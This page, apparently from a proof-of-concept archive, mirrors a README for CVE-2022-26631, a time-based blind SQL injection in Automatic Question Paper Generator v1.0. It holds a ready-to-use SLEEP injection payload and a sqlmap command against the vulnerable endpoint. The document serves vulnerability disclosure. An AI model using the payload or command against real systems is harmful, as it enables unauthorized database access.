Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-26631 PoC — ResearchGate Automatic Question Paper Generator System SQL注入漏洞

Source
https://github.com/5l1v3r1/CVE-2022-26631
Associated Vulnerability
Title:ResearchGate Automatic Question Paper Generator System SQL注入漏洞 (CVE-2022-26631)
Description:Automatic Question Paper Generator v1.0 contains a Time-Based Blind SQL injection vulnerability via the id GET parameter.
Description
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi
Readme
# CVE-2022-26631
CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi

# Description
The `id` GET parameter from Automatic Question Paper Generator System v1.0 appears to be vulnerable to Time-Based Blind SQL injection attacks.

# Payload
An attacker could execute the following SQLi payload in order to gain access to the MySQL database.

`id=1' AND (SELECT 2599 FROM (SELECT(SLEEP(5)))eRGe) AND 'YFLg'='YFLg`

For simplicity, an attacker could automate the exploitation use the tool 'sqlmap' with the following command.

`sqlmap -u 'http://target-url/aqpg/users/question_papers/manage_generate_form.php?id=1' --batch`
File Snapshot

 [4.0K]  /data/pocs/7863b4d0832c06d4ce1abbc34e857b2a41bdfbdc
└── [ 630]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →